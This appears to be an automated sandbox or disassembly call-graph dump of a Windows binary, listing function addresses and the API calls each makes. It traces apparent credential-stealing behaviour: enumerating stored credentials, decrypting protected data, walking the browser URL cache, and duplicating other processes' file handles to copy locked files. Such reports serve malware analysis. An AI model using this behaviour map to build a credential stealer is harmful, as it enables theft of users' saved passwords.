409d1f 6 API calls 38251->38254 38257 445c37 38254->38257 38718 445093 23 API calls 38255->38718 38256 4456eb 38262 4456fd memset memset memset memset 38256->38262 38263 4457ea 38256->38263 38264 445389 259 API calls 38257->38264 38258 445b17 38691 40aebe 38258->38691 38266 445e33 38259->38266 38611 409c70 wcscpy wcsrchr 38262->38611 38614 413d29 38263->38614 38270 445c47 38264->38270 38271 409d1f 6 API calls 38266->38271 38268 445e7e 38272 445f67 38268->38272 38275 40b2cc 27 API calls 38270->38275 38276 445e47 38271->38276 38277 40b2cc 27 API calls 38272->38277 38273 445ab2 memset 38278 40b2cc 27 API calls 38273->38278 38280 445c53 38275->38280 38717 409b98 GetFileAttributesW 38276->38717 38282 445f73 38277->38282 38283 445aa1 38278->38283 38279 409c70 2 API calls 38284 44577e 38279->38284 38285 409d1f 6 API calls 38280->38285 38287 409d1f 6 API calls 38282->38287 38283->38258 38283->38273 38288 409d1f 6 API calls 38283->38288 38583 40add4 38283->38583 38588 445389 38283->38588 38597 40ae51 38283->38597 38289 409c70 2 API calls 38284->38289 38290 445c67 38285->38290 38286 445e56 38286->38255 38294 445e83 memset 38286->38294 38291 445f87 38287->38291 38288->38283 38292 44578d 38289->38292 38293 445389 259 API calls 38290->38293 38721 409b98 GetFileAttributesW 38291->38721 38292->38263 38299 40b2cc 27 API calls 38292->38299 38293->38158 38298 40b2cc 27 API calls 38294->38298 38297->38181 38297->38243 38301 445eab 38298->38301 38300 4457a8 38299->38300 38302 409d1f 6 API calls 38300->38302 38303 409d1f 6 API calls 38301->38303 38304 4457b8 38302->38304 38305 445ebf 38303->38305 38613 409b98 GetFileAttributesW 38304->38613 38307 40ae18 9 API calls 38305->38307 38315 445ef5 38307->38315 38308 4457c7 38308->38263 38310 4087b3 338 API calls 38308->38310 38309 40ae51 9 API calls 38309->38315 38310->38263 38311 445f5c 38312 40aebe FindClose 38311->38312 38312->38272 38313 40add4 2 API calls 38313->38315 38314 40b2cc 27 API calls 38314->38315 38315->38309 38315->38311 38315->38313 38315->38314 38316 409d1f 6 API calls 38315->38316 38318 445f3a 38315->38318 38719 409b98 GetFileAttributesW 38315->38719 38316->38315 38720 445093 23 API calls 38318->38720 38320->38117 38321->38119 38322->38117 38323->38112 38325 40c775 38324->38325 38722 40b1ab free free 38325->38722 38327 40c788 38723 40b1ab free free 38327->38723 38329 40c790 38724 40b1ab free free 38329->38724 38331 40c798 38332 40aa04 free 38331->38332 38333 40c7a0 38332->38333 38725 40c274 memset 38333->38725 38338 40a8ab 9 API calls 38339 40c7c3 38338->38339 38340 40a8ab 9 API calls 38339->38340 38341 40c7d0 38340->38341 38754 40c3c3 38341->38754 38345 40c877 38354 40bdb0 38345->38354 38346 40c86c 38796 4053fe 39 API calls 38346->38796 38352 40c7e5 38352->38345 38352->38346 38353 40c634 50 API calls 38352->38353 38779 40a706 38352->38779 38353->38352 39056 404363 38354->39056 38358 40bdee 38361 40b2cc 27 API calls 38358->38361 38363 40bf5d 38358->38363 38359 40bddf CredEnumerateW 38359->38358 38362 40be02 wcslen 38361->38362 38362->38363 38371 40be1e 38362->38371 39076 40440c 38363->39076 38364 40be26 wcsncmp 38364->38371 38367 40be7d memset 38368 40bea7 memcpy 38367->38368 38367->38371 38369 40bf11 wcschr 38368->38369 38368->38371 38369->38371 38370 40b2cc 27 API calls 38372 40bef6 _wcsnicmp 38370->38372 38371->38363 38371->38364 38371->38367 38371->38368 38371->38369 38371->38370 38373 40bf43 LocalFree 38371->38373 39079 40bd5d 28 API calls 38371->39079 39080 404423 38371->39080 38372->38369 38372->38371 38373->38371 38374 4135f7 39095 4135e0 38374->39095 38377 40b2cc 27 API calls 38378 41360d 38377->38378 38379 40a804 8 API calls 38378->38379 38380 413613 38379->38380 38381 41361b 38380->38381 38382 41363e 38380->38382 38383 40b273 27 API calls 38381->38383 38384 4135e0 FreeLibrary 38382->38384 38385 413625 GetProcAddress 38383->38385 38386 413643 38384->38386 38385->38382 38387 413648 38385->38387 38386->38146 38388 413658 38387->38388 38389 4135e0 FreeLibrary 38387->38389 38388->38146 38390 413666 38389->38390 38390->38146 39098 4449b9 38391->39098 38394 444c1f 38394->38127 38395 4449b9 42 API calls 38397 444b4b 38395->38397 38396 444c15 38399 4449b9 42 API calls 38396->38399 38397->38396 39119 444972 GetVersionExW 38397->39119 38399->38394 38400 444b99 memcmp 38405 444b8c 38400->38405 38401 444c0b 39123 444a85 42 API calls 38401->39123 38405->38400 38405->38401 39120 444aa5 42 API calls 38405->39120 39121 40a7a0 GetVersionExW 38405->39121 39122 444a85 42 API calls 38405->39122 38408 40399d 38407->38408 39124 403a16 38408->39124 38411 403a12 wcsrchr 38411->38144 38412 4039a3 38415 4039f4 38412->38415 38417 403a09 38412->38417 39135 40a02c CreateFileW 38412->39135 38416 4099c6 2 API calls 38415->38416 38415->38417 38416->38417 39138 40b1ab free free 38417->39138 38419 414c2e 17 API calls 38418->38419 38420 404048 38419->38420 38421 414c2e 17 API calls 38420->38421 38422 404056 38421->38422 38423 409d1f 6 API calls 38422->38423 38424 404073 38423->38424 38425 409d1f 6 API calls 38424->38425 38426 40408e 38425->38426 38427 409d1f 6 API calls 38426->38427 38428 4040a6 38427->38428 38429 403af5 20 API calls 38428->38429 38430 4040ba 38429->38430 38431 403af5 20 API calls 38430->38431 38432 4040cb 38431->38432 39165 40414f memset 38432->39165 38434 404140 39179 40b1ab free free 38434->39179 38436 4040ec memset 38439 4040e0 38436->38439 38437 404148 38437->38199 38438 4099c6 2 API calls 38438->38439 38439->38434 38439->38436 38439->38438 38440 40a8ab 9 API calls 38439->38440 38440->38439 39192 40a6e6 WideCharToMultiByte 38441->39192 38443 4087ed 39193 4095d9 memset 38443->39193 38446 408809 memset memset memset memset memset 38447 40b2cc 27 API calls 38446->38447 38448 4088a1 38447->38448 38449 409d1f 6 API calls 38448->38449 38450 4088b1 38449->38450 38451 40b2cc 27 API calls 38450->38451 38452 4088c0 38451->38452 38453 409d1f 6 API calls 38452->38453 38454 4088d0 38453->38454 38455 40b2cc 27 API calls 38454->38455 38456 4088df 38455->38456 38457 409d1f 6 API calls 38456->38457 38458 4088ef 38457->38458 38459 40b2cc 27 API calls 38458->38459 38460 4088fe 38459->38460 38461 409d1f 6 API calls 38460->38461 38462 40890e 38461->38462 38463 40b2cc 27 API calls 38462->38463 38464 40891d 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 40892d 38465->38466 39212 409b98 GetFileAttributesW 38466->39212 38468 40893e 38469 408943 38468->38469 38470 408958 38468->38470 39213 407fdf 75 API calls 38469->39213 39214 409b98 GetFileAttributesW 38470->39214 38474 408953 38474->38199 38493 40b633 free 38492->38493 38494 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38493->38494 38495 413f00 Process32NextW 38494->38495 38496 413da5 OpenProcess 38495->38496 38497 413f17 CloseHandle 38495->38497 38498 413df3 memset 38496->38498 38501 413eb0 38496->38501 38497->38238 39636 413f27 38498->39636 38500 413ebf free 38500->38501 38501->38495 38501->38500 38502 4099f4 3 API calls 38501->38502 38502->38501 38503 413e37 GetModuleHandleW 38505 413e46 GetProcAddress 38503->38505 38506 413e1f 38503->38506 38505->38506 38506->38503 39641 413959 38506->39641 39657 413ca4 38506->39657 38508 413ea2 CloseHandle 38508->38501 38510 414c2e 17 API calls 38509->38510 38511 403eb7 38510->38511 38512 414c2e 17 API calls 38511->38512 38513 403ec5 38512->38513 38514 409d1f 6 API calls 38513->38514 38515 403ee2 38514->38515 38516 409d1f 6 API calls 38515->38516 38517 403efd 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 403f15 38518->38519 38520 403af5 20 API calls 38519->38520 38521 403f29 38520->38521 38522 403af5 20 API calls 38521->38522 38523 403f3a 38522->38523 38524 40414f 33 API calls 38523->38524 38530 403f4f 38524->38530 38525 403faf 39671 40b1ab free free 38525->39671 38527 403f5b memset 38527->38530 38528 403fb7 38528->38184 38529 4099c6 2 API calls 38529->38530 38530->38525 38530->38527 38530->38529 38531 40a8ab 9 API calls 38530->38531 38531->38530 38533 414c2e 17 API calls 38532->38533 38534 403d26 38533->38534 38535 414c2e 17 API calls 38534->38535 38536 403d34 38535->38536 38537 409d1f 6 API calls 38536->38537 38538 403d51 38537->38538 38539 409d1f 6 API calls 38538->38539 38540 403d6c 38539->38540 38541 409d1f 6 API calls 38540->38541 38542 403d84 38541->38542 38543 403af5 20 API calls 38542->38543 38544 403d98 38543->38544 38545 403af5 20 API calls 38544->38545 38546 403da9 38545->38546 38547 40414f 33 API calls 38546->38547 38553 403dbe 38547->38553 38548 403e1e 39672 40b1ab free free 38548->39672 38550 403dca memset 38550->38553 38551 403e26 38551->38187 38552 4099c6 2 API calls 38552->38553 38553->38548 38553->38550 38553->38552 38554 40a8ab 9 API calls 38553->38554 38554->38553 38556 414b81 9 API calls 38555->38556 38557 414c40 38556->38557 38558 414c73 memset 38557->38558 39673 409cea 38557->39673 38560 414c94 38558->38560 39676 414592 RegOpenKeyExW 38560->39676 38562 414c64 SHGetSpecialFolderPathW 38565 414d0b 38562->38565 38563 414cc1 38566 414cf4 wcscpy 38563->38566 39677 414bb0 wcscpy 38563->39677 38565->38179 38566->38565 38568 414cd2 39678 4145ac RegQueryValueExW 38568->39678 38570 414ce9 RegCloseKey 38570->38566 38572 409d62 38571->38572 38573 409d43 wcscpy 38571->38573 38572->38218 38574 409719 2 API calls 38573->38574 38575 409d51 wcscat 38574->38575 38575->38572 38577 40aebe FindClose 38576->38577 38578 40ae21 38577->38578 38579 4099c6 2 API calls 38578->38579 38580 40ae35 38579->38580 38581 409d1f 6 API calls 38580->38581 38582 40ae49 38581->38582 38582->38283 38584 40ade0 38583->38584 38585 40ae0f 38583->38585 38584->38585 38586 40ade7 wcscmp 38584->38586 38585->38283 38586->38585 38587 40adfe wcscmp 38586->38587 38587->38585 38589 40ae18 9 API calls 38588->38589 38591 4453c4 38589->38591 38590 40ae51 9 API calls 38590->38591 38591->38590 38592 4453f3 38591->38592 38593 40add4 2 API calls 38591->38593 38596 445403 254 API calls 38591->38596 38594 40aebe FindClose 38592->38594 38593->38591 38595 4453fe 38594->38595 38595->38283 38596->38591 38598 40ae7b FindNextFileW 38597->38598 38599 40ae5c FindFirstFileW 38597->38599 38600 40ae94 38598->38600 38601 40ae8f 38598->38601 38599->38600 38603 40aeb6 38600->38603 38604 409d1f 6 API calls 38600->38604 38602 40aebe FindClose 38601->38602 38602->38600 38603->38283 38604->38603 38605->38167 38606->38148 38607->38241 38608->38225 38609->38225 38610->38256 38612 409c89 38611->38612 38612->38279 38613->38308 38615 413d39 38614->38615 38616 413d2f FreeLibrary 38614->38616 38617 40b633 free 38615->38617 38616->38615 38618 413d42 38617->38618 38619 40b633 free 38618->38619 38620 413d4a 38619->38620 38620->38140 38621->38147 38622->38135 38623->38211 38625 44db70 38624->38625 38626 40b6fc memset 38625->38626 38627 409c70 2 API calls 38626->38627 38628 40b732 wcsrchr 38627->38628 38629 40b743 38628->38629 38630 40b746 memset 38628->38630 38629->38630 38631 40b2cc 27 API calls 38630->38631 38632 40b76f 38631->38632 38633 409d1f 6 API calls 38632->38633 38634 40b783 38633->38634 39679 409b98 GetFileAttributesW 38634->39679 38636 40b792 38637 40b7c2 38636->38637 38638 409c70 2 API calls 38636->38638 39680 40bb98 38637->39680 38640 40b7a5 38638->38640 38644 40b2cc 27 API calls 38640->38644 38642 40b837 CloseHandle 38646 40b83e memset 38642->38646 38643 40b817 38645 409a45 3 API calls 38643->38645 38647 40b7b2 38644->38647 38648 40b827 CopyFileW 38645->38648 39713 40a6e6 WideCharToMultiByte 38646->39713 38650 409d1f 6 API calls 38647->38650 38648->38646 38650->38637 38651 40b866 38652 444432 121 API calls 38651->38652 38653 40b879 38652->38653 38654 40bad5 38653->38654 38655 40b273 27 API calls 38653->38655 38656 40baeb 38654->38656 38657 40bade DeleteFileW 38654->38657 38658 40b89a 38655->38658 38659 40b04b ??3@YAXPAX 38656->38659 38657->38656 38661 438552 134 API calls 38658->38661 38660 40baf3 38659->38660 38660->38137 38662 40b8a4 38661->38662 38663 40bacd 38662->38663 38665 4251c4 137 API calls 38662->38665 38664 443d90 111 API calls 38663->38664 38664->38654 38687 40b8b8 38665->38687 38666 40bac6 39723 424f26 123 API calls 38666->39723 38667 40b8bd memset 39714 425413 17 API calls 38667->39714 38670 425413 17 API calls 38670->38687 38673 40a71b MultiByteToWideChar 38673->38687 38676 40b9b5 memcmp 38676->38687 38677 4099c6 2 API calls 38677->38687 38678 404423 38 API calls 38678->38687 38681 4251c4 137 API calls 38681->38687 38682 40bb3e memset memcpy 39724 40a734 MultiByteToWideChar 38682->39724 38684 40bb88 LocalFree 38684->38687 38687->38666 38687->38667 38687->38670 38687->38673 38687->38676 38687->38677 38687->38678 38687->38681 38687->38682 38688 40ba5f memcmp 38687->38688 38689 40a734 MultiByteToWideChar 38687->38689 39715 4253ef 16 API calls 38687->39715 39716 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38687->39716 39717 4253af 17 API calls 38687->39717 39718 4253cf 17 API calls 38687->39718 39719 447280 memset 38687->39719 39720 447960 memset memcpy memcpy memcpy 38687->39720 39721 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38687->39721 39722 447920 memcpy memcpy memcpy 38687->39722 38688->38687 38689->38687 38690->38214 38692 40aed1 38691->38692 38693 40aec7 FindClose 38691->38693 38692->38151 38693->38692 38695 4099d7 38694->38695 38696 4099da memcpy 38694->38696 38695->38696 38696->38198 38698 40b2cc 27 API calls 38697->38698 38699 44543f 38698->38699 38700 409d1f 6 API calls 38699->38700 38701 44544f 38700->38701 39813 409b98 GetFileAttributesW 38701->39813 38703 44545e 38704 445476 38703->38704 38705 40b6ef 253 API calls 38703->38705 38706 40b2cc 27 API calls 38704->38706 38705->38704 38707 445482 38706->38707 38708 409d1f 6 API calls 38707->38708 38709 445492 38708->38709 39814 409b98 GetFileAttributesW 38709->39814 38711 4454a1 38712 4454b9 38711->38712 38713 40b6ef 253 API calls 38711->38713 38712->38223 38713->38712 38714->38222 38715->38246 38716->38249 38717->38286 38718->38268 38719->38315 38720->38315 38721->38297 38722->38327 38723->38329 38724->38331 38726 414c2e 17 API calls 38725->38726 38727 40c2ae 38726->38727 38797 40c1d3 38727->38797 38732 40c3be 38749 40a8ab 38732->38749 38733 40afcf 2 API calls 38734 40c2fd FindFirstUrlCacheEntryW 38733->38734 38735 40c3b6 38734->38735 38736 40c31e wcschr 38734->38736 38737 40b04b ??3@YAXPAX 38735->38737 38738 40c331 38736->38738 38739 40c35e FindNextUrlCacheEntryW 38736->38739 38737->38732 38741 40a8ab 9 API calls 38738->38741 38739->38736 38740 40c373 GetLastError 38739->38740 38742 40c3ad FindCloseUrlCache 38740->38742 38743 40c37e 38740->38743 38744 40c33e wcschr 38741->38744 38742->38735 38745 40afcf 2 API calls 38743->38745 38744->38739 38746 40c34f 38744->38746 38747 40c391 FindNextUrlCacheEntryW 38745->38747 38748 40a8ab 9 API calls 38746->38748 38747->38736 38747->38742 38748->38739 38980 40a97a 38749->38980 38752 40a8cc 38752->38338 38986 40b1ab free free 38754->38986 38756 40c3dd 38757 40b2cc 27 API calls 38756->38757 38758 40c3e7 38757->38758 38987 414592 RegOpenKeyExW 38758->38987 38760 40c3f4 38761 40c50e 38760->38761 38762 40c3ff 38760->38762 38776 405337 38761->38776 38763 40a9ce 4 API calls 38762->38763 38764 40c418 memset 38763->38764 38988 40aa1d 38764->38988 38767 40c471 38769 40c47a _wcsupr 38767->38769 38768 40c505 RegCloseKey 38768->38761 38990 40a8d0 7 API calls 38769->38990 38771 40c498 38991 40a8d0 7 API calls 38771->38991 38773 40c4ac memset 38774 40aa1d 38773->38774 38775 40c4e4 RegEnumValueW 38774->38775 38775->38768 38775->38769 38992 405220 38776->38992 38780 4099c6 2 API calls 38779->38780 38781 40a714 _wcslwr 38780->38781 38782 40c634 38781->38782 39049 405361 38782->39049 38785 40c65c wcslen 39052 4053b6 39 API calls 38785->39052 38786 40c71d wcslen 38786->38352 38788 40c677 38789 40c713 38788->38789 39053 40538b 39 API calls 38788->39053 39055 4053df 39 API calls 38789->39055 38792 40c6a5 38792->38789 38793 40c6a9 memset 38792->38793 38794 40c6d3 38793->38794 39054 40c589 44 API calls 38794->39054 38796->38345 38798 40ae18 9 API calls 38797->38798 38804 40c210 38798->38804 38799 40ae51 9 API calls 38799->38804 38800 40c264 38801 40aebe FindClose 38800->38801 38803 40c26f 38801->38803 38802 40add4 2 API calls 38802->38804 38809 40e5ed memset memset 38803->38809 38804->38799 38804->38800 38804->38802 38805 40c231 _wcsicmp 38804->38805 38806 40c1d3 35 API calls 38804->38806 38805->38804 38807 40c248 38805->38807 38806->38804 38822 40c084 22 API calls 38807->38822 38810 414c2e 17 API calls 38809->38810 38811 40e63f 38810->38811 38812 409d1f 6 API calls 38811->38812 38813 40e658 38812->38813 38823 409b98 GetFileAttributesW 38813->38823 38815 40e667 38817 409d1f 6 API calls 38815->38817 38819 40e680 38815->38819 38817->38819 38818 40e68f 38820 40c2d8 38818->38820 38825 40e4b2 38818->38825 38824 409b98 GetFileAttributesW 38819->38824 38820->38732 38820->38733 38822->38804 38823->38815 38824->38818 38846 40e01e 38825->38846 38827 40e593 38828 40e5b0 38827->38828 38829 40e59c DeleteFileW 38827->38829 38830 40b04b ??3@YAXPAX 38828->38830 38829->38828 38832 40e5bb 38830->38832 38831 40e521 38831->38827 38869 40e175 38831->38869 38834 40e5c4 CloseHandle 38832->38834 38835 40e5cc 38832->38835 38834->38835 38837 40b633 free 38835->38837 38836 40e573 38839 40e584 38836->38839 38840 40e57c CloseHandle 38836->38840 38838 40e5db 38837->38838 38843 40b633 free 38838->38843 38912 40b1ab free free 38839->38912 38840->38839 38842 40e540 38842->38836 38889 40e2ab 38842->38889 38844 40e5e3 38843->38844 38844->38820 38913 406214 38846->38913 38849 40e16b 38849->38831 38852 40afcf 2 API calls 38853 40e08d OpenProcess 38852->38853 38854 40e0a4 GetCurrentProcess DuplicateHandle 38853->38854 38858 40e152 38853->38858 38855 40e0d0 GetFileSize 38854->38855 38856 40e14a CloseHandle 38854->38856 38949 409a45 GetTempPathW 38855->38949 38856->38858 38857 40e160 38861 40b04b ??3@YAXPAX 38857->38861 38858->38857 38860 406214 22 API calls 38858->38860 38860->38857 38861->38849 38862 40e0ea 38952 4096dc CreateFileW 38862->38952 38864 40e0f1 CreateFileMappingW 38865 40e140 CloseHandle CloseHandle 38864->38865 38866 40e10b MapViewOfFile 38864->38866 38865->38856 38867 40e13b CloseHandle 38866->38867 38868 40e11f WriteFile UnmapViewOfFile 38866->38868 38867->38865 38868->38867 38870 40e18c 38869->38870 38953 406b90 38870->38953 38873 40e1a7 memset 38879 40e1e8 38873->38879 38874 40e299 38963 4069a3 38874->38963 38880 40e283 38879->38880 38881 40dd50 _wcsicmp 38879->38881 38887 40e244 _snwprintf 38879->38887 38970 406e8f 13 API calls 38879->38970 38971 40742e 8 API calls 38879->38971 38972 40aae3 wcslen wcslen _memicmp 38879->38972 38974 406b53 SetFilePointerEx ReadFile 38879->38974 38882 40e291 38880->38882 38883 40e288 free 38880->38883 38881->38879 38884 40aa04 free 38882->38884 38883->38882 38884->38874 38973 40a8d0 7 API calls 38887->38973 38890 40e2c2 38889->38890 38891 406b90 11 API calls 38890->38891 38906 40e2d3 38891->38906 38892 40e4a0 38893 4069a3 2 API calls 38892->38893 38894 40e4ab 38893->38894 38894->38842 38897 40e489 38898 40aa04 free 38897->38898 38900 40e491 38898->38900 38899 40dd50 _wcsicmp 38899->38906 38900->38892 38901 40e497 free 38900->38901 38901->38892 38903 40e376 memset 38977 40aa29 6 API calls 38903->38977 38906->38892 38906->38897 38906->38899 38907 40e3e0 memcpy 38906->38907 38908 40e3b3 wcschr 38906->38908 38909 40e3fb memcpy 38906->38909 38910 40e416 memcpy 38906->38910 38911 40e431 memcpy 38906->38911 38975 406e8f 13 API calls 38906->38975 38976 40dd50 _wcsicmp 38906->38976 38978 40742e 8 API calls 38906->38978 38979 406b53 SetFilePointerEx ReadFile 38906->38979 38907->38906 38908->38906 38909->38906 38910->38906 38911->38906 38912->38827 38914 406294 CloseHandle 38913->38914 38915 406224 38914->38915 38916 4096c3 CreateFileW 38915->38916 38917 40622d 38916->38917 38918 406281 GetLastError 38917->38918 38919 40a2ef ReadFile 38917->38919 38923 40625a 38918->38923 38920 406244 38919->38920 38920->38918 38921 40624b 38920->38921 38922 406777 19 API calls 38921->38922 38921->38923 38922->38923 38923->38849 38924 40dd85 memset 38923->38924 38925 409bca GetModuleFileNameW 38924->38925 38926 40ddbe CreateFileW 38925->38926 38929 40ddf1 38926->38929 38927 40afcf ??2@YAPAXI ??3@YAXPAX 38927->38929 38928 41352f 9 API calls 38928->38929 38929->38927 38929->38928 38930 40de0b NtQuerySystemInformation 38929->38930 38931 40de3b CloseHandle GetCurrentProcessId 38929->38931 38930->38929 38932 40de54 38931->38932 38933 413d4c 46 API calls 38932->38933 38941 40de88 38933->38941 38934 40e00c 38935 413d29 free FreeLibrary 38934->38935 38936 40e014 38935->38936 38936->38849 38936->38852 38937 40dea9 _wcsicmp 38938 40dee7 OpenProcess 38937->38938 38939 40debd _wcsicmp 38937->38939 38938->38941 38939->38938 38940 40ded0 _wcsicmp 38939->38940 38940->38938 38940->38941 38941->38934 38941->38937 38942 40dfef CloseHandle 38941->38942 38943 40df78 38941->38943 38944 40df23 GetCurrentProcess DuplicateHandle 38941->38944 38947 40df8f CloseHandle 38941->38947 38942->38941 38943->38942 38943->38947 38948 40dfae _wcsicmp 38943->38948 38944->38941 38945 40df4c memset 38944->38945 38946 41352f 9 API calls 38945->38946 38946->38941 38947->38943 38948->38941 38948->38943 38950 409a74 GetTempFileNameW 38949->38950 38951 409a66 GetWindowsDirectoryW 38949->38951 38950->38862 38951->38950 38952->38864 38954 406bd5 38953->38954 38957 406bad 38953->38957 38956 4066bf free malloc memcpy free free 38954->38956 38962 406c0f 38954->38962 38955 406bba _wcsicmp 38955->38954 38955->38957 38958 406be5 38956->38958 38957->38954 38957->38955 38959 40afcf ??2@YAPAXI ??3@YAXPAX 38958->38959 38958->38962 38960 406bff 38959->38960 38961 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 38960->38961 38961->38962 38962->38873 38962->38874 38964 4069c4 ??3@YAXPAX 38963->38964 38965 4069af 38964->38965 38966 40b633 free 38965->38966 38967 4069ba 38966->38967 38968 40b04b ??3@YAXPAX 38967->38968 38969 4069c2 38968->38969 38969->38842 38970->38879 38971->38879 38972->38879 38973->38879 38974->38879 38975->38906 38976->38903 38977->38906 38978->38906 38979->38906 38982 40a980 38980->38982 38981 40a8bb 38981->38752 38985 40a8d0 7 API calls 38981->38985 38982->38981 38983 40a995 _wcsicmp 38982->38983 38984 40a99c wcscmp 38982->38984 38983->38982 38984->38982 38985->38752 38986->38756 38987->38760 38989 40aa23 RegEnumValueW 38988->38989 38989->38767 38989->38768 38990->38771 38991->38773 38993 405335 38992->38993 38994 40522a 38992->38994 38993->38352 38995 40b2cc 27 API calls 38994->38995 38996 405234 38995->38996 38997 40a804 8 API calls 38996->38997 38998 40523a 38997->38998 39037 40b273 38998->39037 39000 405248 _mbscpy _mbscat GetProcAddress 39001 40b273 27 API calls 39000->39001 39002 405279 39001->39002 39040 405211 GetProcAddress 39002->39040 39004 405282 39005 40b273 27 API calls 39004->39005 39006 40528f 39005->39006 39041 405211 GetProcAddress 39006->39041 39008 405298 39009 40b273 27 API calls 39008->39009 39010 4052a5 39009->39010 39042 405211 GetProcAddress 39010->39042 39012 4052ae 39013 40b273 27 API calls 39012->39013 39014 4052bb 39013->39014 39043 405211 GetProcAddress 39014->39043 39016 4052c4 39017 40b273 27 API calls 39016->39017 39018 4052d1 39017->39018 39044 405211 GetProcAddress 39018->39044 39020 4052da 39021 40b273 27 API calls 39020->39021 39022 4052e7 39021->39022 39045 405211 GetProcAddress 39022->39045 39024 4052f0 39025 40b273 27 API calls 39024->39025 39026 4052fd 39025->39026 39046 405211 GetProcAddress 39026->39046 39028 405306 39029 40b273 27 API calls 39028->39029 39030 405313 39029->39030 39047 405211 GetProcAddress 39030->39047 39032 40531c 39033 40b273 27 API calls 39032->39033 39034 405329 39033->39034 39048 405211 GetProcAddress 39034->39048 39036 405332 39036->38993 39038 40b58d 27 API calls 39037->39038 39039 40b18c 39038->39039 39039->39000 39040->39004 39041->39008 39042->39012 39043->39016 39044->39020 39045->39024 39046->39028 39047->39032 39048->39036 39050 405220 39 API calls 39049->39050 39051 405369 39050->39051 39051->38785 39051->38786 39052->38788 39053->38792 39054->38789 39055->38786 39057 40440c FreeLibrary 39056->39057 39058 40436d 39057->39058 39059 40a804 8 API calls 39058->39059 39060 404377 39059->39060 39061 404383 39060->39061 39062 404405 39060->39062 39063 40b273 27 API calls 39061->39063 39062->38358 39062->38359 39062->38363 39064 40438d GetProcAddress 39063->39064 39065 40b273 27 API calls 39064->39065 39066 4043a7 GetProcAddress 39065->39066 39067 40b273 27 API calls 39066->39067 39068 4043ba GetProcAddress 39067->39068 39069 40b273 27 API calls 39068->39069 39070 4043ce GetProcAddress 39069->39070 39071 40b273 27 API calls 39070->39071 39072 4043e2 GetProcAddress 39071->39072 39073 4043f1 39072->39073 39074 4043f7 39073->39074 39075 40440c FreeLibrary 39073->39075 39074->39062 39075->39062 39077 404413 FreeLibrary 39076->39077 39078 40441e 39076->39078 39077->39078 39078->38374 39079->38371 39081 40447e 39080->39081 39082 40442e 39080->39082 39083 404485 CryptUnprotectData 39081->39083 39084 40449c 39081->39084 39085 40b2cc 27 API calls 39082->39085 39083->39084 39084->38371 39086 404438 39085->39086 39087 40a804 8 API calls 39086->39087 39088 40443e 39087->39088 39089 404445 39088->39089 39090 404467 39088->39090 39091 40b273 27 API calls 39089->39091 39090->39081 39092 404475 FreeLibrary 39090->39092 39093 40444f GetProcAddress 39091->39093 39092->39081 39093->39090 39094 404460 39093->39094 39094->39090 39096 4135f6 39095->39096 39097 4135eb FreeLibrary 39095->39097 39096->38377 39097->39096 39099 4449c4 39098->39099 39100 444a52 39098->39100 39101 40b2cc 27 API calls 39099->39101 39100->38394 39100->38395 39102 4449cb 39101->39102 39103 40a804 8 API calls 39102->39103 39104 4449d1 39103->39104 39105 40b273 27 API calls 39104->39105 39106 4449dc GetProcAddress 39105->39106 39107 40b273 27 API calls 39106->39107 39108 4449f3 GetProcAddress 39107->39108 39109 40b273 27 API calls 39108->39109 39110 444a04 GetProcAddress 39109->39110 39111 40b273 27 API calls 39110->39111 39112 444a15 GetProcAddress 39111->39112 39113 40b273 27 API calls 39112->39113 39114 444a26 GetProcAddress 39113->39114 39115 40b273 27 API calls 39114->39115 39116 444a37 GetProcAddress 39115->39116 39117 40b273 27 API calls 39116->39117 39118 444a48 GetProcAddress 39117->39118 39118->39100 39119->38405 39120->38405 39121->38405 39122->38405 39123->38396 39125 403a29 39124->39125 39139 403bed memset memset 39125->39139 39127 403a2f 39128 403ae7 39127->39128 39129 403a3f memset 39127->39129 39132 409b98 GetFileAttributesW 39127->39132 39133 40a8d0 7 API calls 39127->39133 39134 409d1f 6 API calls 39127->39134 39152 40b1ab free free 39128->39152 39129->39127 39131 403aef 39131->38412 39132->39127 39133->39127 39134->39127 39136 40a051 GetFileTime CloseHandle 39135->39136 39137 4039ca CompareFileTime 39135->39137 39136->39137 39137->38412 39138->38411 39140 414c2e 17 API calls 39139->39140 39141 403c38 39140->39141 39142 409719 2 API calls 39141->39142 39143 403c3f wcscat 39142->39143 39144 414c2e 17 API calls 39143->39144 39145 403c61 39144->39145 39146 409719 2 API calls 39145->39146 39147 403c68 wcscat 39146->39147 39153 403af5 39147->39153 39150 403af5 20 API calls 39151 403c95 39150->39151 39151->39127 39152->39131 39154 403b02 39153->39154 39155 40ae18 9 API calls 39154->39155 39163 403b37 39155->39163 39156 403bdb 39157 40aebe FindClose 39156->39157 39158 403be6 39157->39158 39158->39150 39159 40ae18 9 API calls 39159->39163 39160 40ae51 9 API calls 39160->39163 39161 40add4 wcscmp wcscmp 39161->39163 39162 40aebe FindClose 39162->39163 39163->39156 39163->39159 39163->39160 39163->39161 39163->39162 39164 40a8d0 7 API calls 39163->39164 39164->39163 39166 409d1f 6 API calls 39165->39166 39167 404190 39166->39167 39180 409b98 GetFileAttributesW 39167->39180 39169 40419c 39170 4041a7 6 API calls 39169->39170 39171 40435c 39169->39171 39173 40424f 39170->39173 39171->38439 39173->39171 39174 40425e memset 39173->39174 39176 409d1f 6 API calls 39173->39176 39177 40a8ab 9 API calls 39173->39177 39181 414842 39173->39181 39174->39173 39175 404296 wcscpy 39174->39175 39175->39173 39176->39173 39178 4042b6 memset memset _snwprintf wcscpy 39177->39178 39178->39173 39179->38437 39180->39169 39184 41443e 39181->39184 39183 414866 39183->39173 39185 41444b 39184->39185 39186 414451 39185->39186 39187 4144a3 GetPrivateProfileStringW 39185->39187 39188 414491 39186->39188 39189 414455 wcschr 39186->39189 39187->39183 39190 414495 WritePrivateProfileStringW 39188->39190 39189->39188 39191 414463 _snwprintf 39189->39191 39190->39183 39191->39190 39192->38443 39194 40b2cc 27 API calls 39193->39194 39195 409615 39194->39195 39196 409d1f 6 API calls 39195->39196 39197 409625 39196->39197 39222 409b98 GetFileAttributesW 39197->39222 39199 409634 39200 409648 39199->39200 39223 4091b8 memset 39199->39223 39202 40b2cc 27 API calls 39200->39202 39204 408801 39200->39204 39203 40965d 39202->39203 39205 409d1f 6 API calls 39203->39205 39204->38446 39204->38474 39206 40966d 39205->39206 39275 409b98 GetFileAttributesW 39206->39275 39208 40967c 39208->39204 39209 409681 39208->39209 39276 409529 72 API calls 